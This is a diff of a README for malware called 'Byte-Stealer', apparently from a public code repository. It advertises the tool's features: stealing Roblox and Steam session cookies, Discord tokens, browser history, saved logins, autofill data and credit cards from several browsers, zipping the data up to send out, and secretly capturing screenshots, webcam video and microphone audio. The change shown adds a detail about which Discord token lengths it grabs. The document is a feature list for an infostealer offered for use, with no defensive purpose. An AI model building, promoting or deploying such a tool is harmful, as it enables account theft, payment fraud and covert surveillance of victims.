0x77ff/Byte-Stealer/README.md

 • Roblox Cookie Stealer from Chrome,Opera,Firefox and Edge 🍪
 • steamLoginSecure+sessionId Token Stealer (steam login cookie) from Chrome(not a client) 🍘
 • Steal History-Bookmarks-Cookies-SavedLoginDetails-BrowserAutofill-CreditCards from basically all chromium browsers and sends them as .zip 📁
-• Steal Discord token from all types of installation 🔘
+• Steal Discord token from all types of installation(59chars and 70chars) 🔘
 • Auto Screenshot as .png 🖼️
 • Records 5s clip from webcam as .avi 🎥
 • Records 5s clip from mic as .wav 🎤